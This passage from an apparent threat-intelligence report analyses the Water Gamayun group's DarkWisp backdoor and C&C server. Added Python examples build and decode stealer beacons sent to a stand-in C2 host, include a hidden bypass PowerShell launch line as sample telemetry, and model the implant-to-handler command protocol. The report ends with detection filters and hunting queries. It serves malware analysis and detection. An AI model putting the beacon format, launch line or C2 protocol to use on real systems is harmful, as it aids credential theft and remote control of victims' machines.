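def _b64_text(value: str) -> str:
    """Decode a Base64 query value to text; leave anything that is not Base64 alone."""
    padded = value + "=" * (-len(value) % 4)
    if not B64_RE.match(padded):
        return value
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return value
    return text if text.isprintable() else value


def decode_notification(url: str) -> dict[str, str] | None:
    """Decoded parameters of a Variant C style beacon, or None when the request
    is not a /send_notification GET on port 8081."""
    parts = urlsplit(url)
    if parts.path != "/send_notification" or parts.port != 8081:
        return None
    decoded = {}
    for pair in parts.query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        decoded[unquote(key)] = _b64_text(unquote(value))  # unquote keeps '+' intact
    return decoded


def make_beacon(host: str, fields: dict[str, str]) -> str:
    """Build a beacon the way the page describes it: each value Base64-encoded on
    its own and appended after /send_notification? (parameter names assumed)."""
    enc = {k: base64.b64encode(v.encode()).decode() for k, v in fields.items()}
    return f"https://{host}:8081/send_notification?" + urlencode(enc)


# Constructed telemetry: the renamed launcher spawning PowerShell, and a benign
# IntelliJ runnerw.exe launching java, which must not fire.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{A1}", "ParentProcessGuid": "{P0}",
     "Image": r"C:\ProgramData\invoker.exe", "OriginalFileName": "runnerw.exe",
     "CommandLine": r"invoker.exe powershell.exe -w hidden -ep bypass -f C:\ProgramData\payload.ps1"},
    {"EventID": 1, "ProcessGuid": "{A2}", "ParentProcessGuid": "{A1}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"powershell.exe -w hidden -ep bypass -f C:\ProgramData\payload.ps1"},
    {"EventID": 1, "ProcessGuid": "{B1}", "ParentProcessGuid": "{P1}",
     "Image": r"C:\Program Files\JetBrains\IntelliJ IDEA\bin\runnerw.exe",
     "OriginalFileName": "runnerw.exe", "CommandLine": "runnerw.exe java -cp app.jar Main"},
    {"EventID": 1, "ProcessGuid": "{B2}", "ParentProcessGuid": "{B1}",
     "Image": r"C:\Program Files\Java\bin\java.exe", "OriginalFileName": "java.exe",
     "CommandLine": "java -cp app.jar Main"},
]
SAMPLE_BEACON = make_beacon("c2.example.invalid", {
    "build": "encrypthub", "user": "DESKTOP-LAB\\alice",
    "passwords": "42", "cookies": "1310", "wallets": "2", "messengers": "1"})

if __name__ == "__main__":
    print(find_proxied_powershell(SAMPLE_EVENTS))
    print(decode_notification(SAMPLE_BEACON))
```

The process rule deliberately keys on the parent's OriginalFileName rather than on the child's command line, so it still fires if the operator drops the hidden-window and bypass flags; the flags are reported only as supporting evidence.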
Figure 39. Remote PowerShell execution via JavaScript in an empty HTML page to download AnyDesk

Furthermore, our investigation revealed that the C&C server runs on the same host (Figure 40), specifically on port 8081. We obtained the C&C source code, configuration files, victim list, and additional relevant data.

Figure 40. Server-side C&C content

C&C server implementation

Table 8. C&C handler script (file type: Python)
Handler.py
  SHA-256: 724aa4d5e3fb96be0a4a01a74324e7123d3281d7e3dce0f79ae717c5a7383ef1
  Size: 15504 bytes

The handler script (Table 8) is the server-side component of the C&C server for the DarkWisp backdoor, managing and communicating with compromised client machines. Its main function starts a multi-threaded TCP server that listens for incoming client connections on the configured HOST and PORT (Figure 41). Using the socket library, the server binds to its assigned address and listens with a connection backlog of 5. When a new client connection is accepted, a dedicated thread is spawned to handle that client, so the server can serve multiple connections simultaneously. The server also launches a Flask-based web server on port 8081 to handle HTTP requests, along with a periodic ping function (Figure 42).

Figure 41. C&C main function
Figure 42. send_periodic_ping function

Once a connection with a client is established, the server can receive three distinct types of messages, prefixed with INFO|, COMMAND|, or PING (Figure 43). On receipt of client information, the server automatically sends a notification to the attacker via Telegram (Figure 44).
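The message types just listed are the server half of the framing described in the DarkWisp backdoor section (COMMAND|<Base64> down, RESULT|<Base64> up, PING to keep the socket alive, and a second copy of each result over HTTPS to /receive_result on port 8081). The following added example (Python, not code from the page, the backdoor or the handler) models both ends of that exchange in one place so the protocol can be exercised without a live sample. It reproduces the one documented per-build rule (build encrypthub receives whoami on connect). Assumptions: the INFO body is JSON, /receive_result carries the output in a query parameter named result, and commands are resolved from a stub table rather than executed.

```python
"""Both ends of the DarkWisp message exchange.

Added example, not code from the page, the backdoor or the handler. Models the
framing the two sections describe: INFO| to register, PING to keep the TCP
session alive, COMMAND|<Base64> down and RESULT|<Base64> up, plus the redundant
copy of a result via /receive_result on the HTTPS side. Assumptions: INFO body
is JSON, /receive_result uses a 'result' query parameter, and commands come
from a stub table instead of being executed.
"""
from __future__ import annotations

import base64
import binascii
import json
from urllib.parse import urlencode

KINDS = {"INFO", "COMMAND", "RESULT", "PING"}
BUILD_COMMANDS = {"encrypthub": "whoami"}  # command the server issues on connect, per build


def b64(text: str) -> str:
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


def unb64(data: str) -> str:
    try:
        return base64.b64decode(data, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"not Base64 text: {data!r}") from exc


def frame(kind: str, body: str = "") -> str:
    if kind not in KINDS:
        raise ValueError(kind)
    return "PING" if kind == "PING" else f"{kind}|{body}"


def parse(message: str) -> tuple[str, str]:
    """Split 'KIND|body' (bare 'PING' has no body) and reject anything else."""
    kind, sep, body = message.strip().partition("|")
    if kind not in KINDS or (kind == "PING") == bool(sep):
        raise ValueError(f"malformed message: {message!r}")
    return kind, body


class Implant:
    """Client side. `run` maps a command string to its output (a stub here)."""

    def __init__(self, build: str, profile: dict, run):
        self.build, self.profile, self.run = build, profile, run

    def hello(self) -> str:
        return frame("INFO", json.dumps({"build": self.build, **self.profile}))

    def on_server_message(self, message: str) -> list[str]:
        """What goes back on the TCP socket, plus the HTTPS path used for the
        redundant copy of a result (the malware sends both)."""
        kind, body = parse(message)
        if kind == "PING":
            return ["PING"]
        if kind == "COMMAND":
            output = self.run(unb64(body))
            return [frame("RESULT", b64(output)),
                    "/receive_result?" + urlencode({"result": b64(output)})]
        raise ValueError(f"implant does not accept {kind}")


class Handler:
    """Server side: registers clients on INFO, records the Telegram-style
    notification, issues the build's command, stores RESULTs."""

    def __init__(self) -> None:
        self.clients: dict[str, dict] = {}
        self.notifications: list[str] = []

    def send_command(self, peer: str, command: str) -> str:
        """Operator-issued command for a registered client (the COMMAND| branch)."""
        self.clients[peer]  # KeyError if the client never registered
        return frame("COMMAND", b64(command))

    def on_client_message(self, peer: str, message: str) -> str | None:
        kind, body = parse(message)
        if kind == "INFO":
            info = json.loads(body)
            self.clients[peer] = {"build": info.get("build", "?"), "profile": info, "results": []}
            self.notifications.append(f"new client {peer} build={info.get('build')} user={info.get('user')}")
            cmd = BUILD_COMMANDS.get(info.get("build"))
            return self.send_command(peer, cmd) if cmd else None
        rec = self.clients[peer]
        if kind == "PING":
            return "PING"
        if kind == "RESULT":
            rec["results"].append(unb64(body))
            return None
        raise ValueError("COMMAND is issued by the operator, not by clients")

    def list_clients_by_build(self, build: str) -> list[str]:
        return [p for p, rec in self.clients.items() if rec["build"] == build]


def exchange() -> dict:
    """One registration-plus-whoami session with a stubbed command table."""
    implant = Implant("encrypthub", {"user": "alice", "admin": False},
                      run={"whoami": "desktop-lab\\alice"}.__getitem__)
    server, peer, transcript = Handler(), "198.51.100.7:51000", []
    hello = implant.hello()
    transcript.append(("C->S", hello))
    reply = server.on_client_message(peer, hello)
    transcript.append(("S->C", reply))
    for msg in implant.on_server_message(reply):
        transcript.append(("C->S", msg))
        if msg.startswith("RESULT|"):
            server.on_client_message(peer, msg)
    return {"transcript": transcript, "server": server}


if __name__ == "__main__":
    for direction, msg in exchange()["transcript"]:
        print(direction, msg)
```

Running it prints the same COMMAND|d2hvYW1p the page shows in Figure 15, followed by the RESULT| frame and the /receive_result path; the transcript is what a network sensor would see once the Base64 layer is peeled off, since nothing else protects the TCP channel.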
Figure 45 shows how it prepares a notification message with system information for the attacker via Telegram.

Figure 43. Handling client messages
Figure 44. Handling INFO messages from clients
Figure 45. Preparing the information for a Telegram notification message
Figure 46. Telegram notification function

Moreover, the malware author can send Base64-encoded remote commands to the victim's machine (Figure 47). The encoding hides the commands from naive string matching on the wire while the results flow back to the attacker; note that Base64 is reversible encoding, not encryption, so a decoded capture reveals every command and result in the clear.

Figure 47. Sending remote commands to the infected machine
Figure 48. Handling COMMAND messages from clients

Furthermore, we obtained a comprehensive list of all infected machines (Figure 49) by accessing specific URLs exposed by the server, /list_all_clients and /list_clients_by_build (Figure 50). These endpoints return detailed information about compromised clients.

Figure 49. List of compromised machines from the C&C server
Figure 50. list_all_clients function

We were also able to locate the stored information from the compromised machines on the C&C server (Figure 51).

Figure 51. Information from the compromised machines

Conclusion

Water Gamayun's use of various delivery methods and techniques in this campaign, such as delivering malicious payloads through signed Microsoft Installer files and abusing LOLBins, highlights the group's adaptability in compromising victims' systems and data.
Throughout this analysis, we have detailed the arsenal of tools used by Water Gamayun, including custom backdoors like SilentPrism and DarkWisp, as well as information stealers such as the EncryptHub Stealer variants and known malware like Stealc and Rhadamanthys. Their intricately designed payloads and C&C infrastructure enable the threat actor to maintain persistence, dynamically control infected systems, and obfuscate their activities. By gaining access to the components and modules of their C&C servers, we were able to conduct a comprehensive analysis of their architecture, functionality, and evasion techniques.

It is essential for organizations to stay informed about such evolving threats and to understand the importance of advanced threat detection and robust cybersecurity measures. By keeping abreast of the latest threat intelligence and adopting proactive defense strategies, organizations can better protect themselves against actors like Water Gamayun and mitigate potential risks.

Proactive security with Trend Vision One™

Organizations can protect themselves from attacks such as those employed by this threat actor with Trend Vision One™ products, the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management, security operations, and robust layered protection. This comprehensive approach helps you predict and prevent threats, accelerating proactive security outcomes across your entire digital estate. Backed by decades of cybersecurity leadership and Trend Cybertron, the industry's first proactive cybersecurity AI, it delivers proven results: a 92% reduction in ransomware risk and a 99% reduction in detection time. Security leaders can benchmark their posture and showcase continuous improvement to stakeholders.
With Trend Vision One, you're enabled to eliminate security blind spots, focus on what matters most, and elevate security into a strategic partner for innovation.

Trend protections for CVE-2025-26633

The following protections have been available to Trend Micro customers:

Trend Vision One™ - Network Security
TippingPoint Intrusion Prevention Filters
45359: TCP: Backdoor.Shell.DarkWisp.A Runtime Detection
45360: HTTP: Trojan.Shell.EncryptHubStealer.B Runtime Detection
45361: HTTP: Backdoor.Shell.SilentPrism.A Runtime Detection
45594: HTTP: Trojan.Shell.EncryptHubStealer.B Runtime Detection (Notification Request)
45595: HTTP: Trojan.Shell.MSCEvilTwin.A Runtime Detection (Payload - Server Response)

Hunting Queries

Trend Vision One Search App
Trend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post against data in their environment.

Water Gamayun Malware Arsenal
malName: (*RHADAMANTHYS* OR *FICKLESHADE* OR *SILENTPRISM* OR *DARKWISP*) AND eventName: MALWARE_DETECTION AND LogType: detection

EncryptHub Stealer Module execution
eventId:1 AND processFilePath:*powershell.exe AND processCmd:*encrypthub_steal.ps1

More hunting queries are available for Trend Vision One customers with Threat Insights Entitlement enabled.

Indicators of Compromise (IOCs)

The indicators of compromise for this entry can be found in the linked IOC list.

Source: https://www.trendmicro.com/en_us/research/25/c/deep-dive-into-water-gamayun.html